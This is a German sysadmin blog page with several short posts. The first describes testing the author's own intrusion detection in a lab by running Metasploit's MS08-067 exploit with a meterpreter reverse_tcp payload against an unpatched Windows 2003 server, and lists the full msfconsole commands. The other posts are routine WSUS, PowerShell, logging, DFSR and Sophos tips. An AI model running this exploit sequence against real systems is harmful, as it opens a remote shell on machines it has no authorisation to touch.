Artikel mit ‘Work’ getagged

Test Intrusion Detection mit Metasploit / Kali 2.0

Montag, 28. September 2015

Um die Intrusion Detection unseres Netzwerkes zu testen, habe ich ein wenig mit Kali / Metasploit herum experimentiert.

Als Ziel habe ich einen ungepatchten Windows 2003 R2 Server (deutsch) auf einem ESXi verwendet.

Als Angreifer kam ein Kali 2.0 ebenfalls auf einem ESXi zum Einsatz.

Als Exploit bietet sich hier immer der MS08_067 an, da dieser in der Regel relativ zuverlässig „zündet“.

Jedoch leider nicht auf meinem Deutschen Server – hierfür ist ggf. die dedizierte Angabe des Targets nötig.


msfconsole -q
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST Ziel.IP
set LHOST Quell.IP
set target 66
exploit

Ohne die Angabe des Target stürzt der Server Dienst am Ziel immer „nur“ ab – jedoch wird der Payload nicht ausgeführt.

Mit Show Targets kann man sich alle Möglichkeiten anzeigen lassen – wobei hier das NX oder NO NX glaube ich eine entscheidende Rolle spielt 🙂

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)

WSUS – Umgang mit ersetzten / superseded Updates

Dienstag, 25. August 2015

Da ich es immer mal wieder Nachschlagen muss – hier ein Link:

How to identify and decline superseded updates in WSUS

  • No icon: update doesn’t supersede another one nor is it superseded by an update
  • Blue square on top: this update supersedes another update, these updates you do not want to clean…!!
  • Blue square in the middle: this update has been superseded by another update, and superseded another update as well, this is an example of an update you may want to clean (decline)
  • Blue square in the right below corner: this update has been superseded by another update, this is an example of an update you may want to clean (decline)

 

VN:F [1.9.22_1171]
Rating: 6.0/10 (1 vote cast)

Powershell – AD Gruppen aus csv Import

Montag, 20. Juli 2015

Bevor ich es mal wieder vergesse:

Import-Module ActiveDirectory

import-csv c:\liste.csv | foreach {New-ADGroup -Name $_.name -Path "OU=Hallo,DC=Welt,DC=it" -SamAccountName $_.name -GroupCategory 1 -GroupScope 1}

Das CSV enthält in der ersten Zeile die Überschrift name und darunter in jeder Zeile einen Gruppennamen:

name
RG-Gruppe01
RG-Gruppe02
….

Erläuterung:
GroupCategory:
Distribution or 0
Security or 1

GroupScope:
DomainLocal or 0
Global or 1
Universal or 2

Weitere Details gibt es hier:
Microsoft Technet – New-ADGroup
Microsoft Technet – Verwenden des Cmdlet „Import-Csv“
Andi Sichel – Active Directory: Benutzer, Gruppen und OUs via Powershell

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)

Druckjobs im Windows Server > 2008 loggen

Dienstag, 09. September 2014

Nun der eigentliche Grund warum ich mich heute in den Admin Bereich meines Blogs begeben habe.

Seit Windows 2008 werden Druckjobs nicht mehr per Default im Eventlog des Printservers gespeichert – da das manchmal aber ganz hilfreich ist kann man dies aber auch wieder aktivieren. Sehr Hilfreich ist hier die wirklich gute Übersetzung des deutschen Windows Servers …..

Operational -> Betriebsbereit

Also – Ereignisanzeige starten -> Anwendungs- und Dienstprotokolle -> Microsoft -> Windows -> PrintService -> Betriebsbereit

Ein Rechtsklick auf „Betriebsbereit“ fördert ein Kontextmenü zu Tage in welchem man dann das Protokoll aktivieren kann:

Um schnell und komfortabel an das Log zu kommen – kann  man sich dieses einfach unter den Benutzerdefinierten Ansichten ablegen:

2014-09-09_09h27_55

2014-09-09_09h28_16

2014-09-09_09h33_59

2014-09-09_09h34_26

So sieht dann das Ergebnis aus:

2014-09-09_09h34_46

VN:F [1.9.22_1171]
Rating: 7.0/10 (1 vote cast)

2012 Server Gruppenrichtlinien Repliaktion
SYSVOL / NETLOGON Replikation defekt

Freitag, 31. Januar 2014

-UPDATE-Um DFS-R in den AutoRecocery Modus zu schalten – liest man diesen Microsoft Support Artikel 🙂 -/UPDATE-
Sooo da es mich einmal mehr nervt – schreib ich es jetzt hier auf.

Beim Herunterfahren z.B. nach Updates bleiben meine W2k12 Server gerne einmal stehen, so dass ich sie immer noch zusätzlich mit /force durchstarte.
Dieses Phänomen tritt auch min. in noch einer mir bekannten Umgebung auf (Gruß an KME)

Das an sich wäre ja noch nicht so schlimm – leider bleibt dann auch oft (immer?!) der DFSR Dienst der Domain Controller stehen – was sich dann in nicht mehr replizierten SYSVOL und NETLOGON Ordner äußert.

Der tolle neue Servermanager meldet – ALLES GRÜN
2014-01-31_11h40_03

Im Eventlog des DFS sieht das schon anders aus:
(mehr …)

VN:F [1.9.22_1171]
Rating: 10.0/10 (1 vote cast)

Sophos Fehler 0x800041f09 bei Installation

Montag, 29. Juli 2013

Ja es könnte alles so einfach sein 🙂

Fehler: Sophos Endpoint Protection lässt sich nicht installieren.
-> 0x800041f09 Fragen sie ihren Netzwerkadministrator ^^

Ich hatte sowohl auf einem Windows 8 x64 Clients als auch an einem Windows 2008 R2 Server die o.g. Fehlermeldung.

Die Sophos Installation bricht ab und die bei Google gefunden Sophos KBs helfen nicht …

Lösung:
Auf beiden Maschinen befand sich in C:\Program Files (x86) ein Sophos Ordner mit je einer 32 und 64 bit sophos_detoured.dll welche in Benutzung waren.

Um die DLLs zu löschen muss man sowohl im 32bit als auch im 64bit Pfad der Registry folgenden Eintrag löschen:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Windows

und

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\
Windows NT\CurrentVersion\Windows

den Eintrag „AppInit_DLLs“=“C:\\PROGRA~2\\Sophos\\SOPHOS~1\\SOPHOS~2.DLL“ löschen.

Reboot – den Ordner in C:\Program Files (x86) löschen – HAPPY!!

VN:F [1.9.22_1171]
Rating: 1.0/10 (1 vote cast)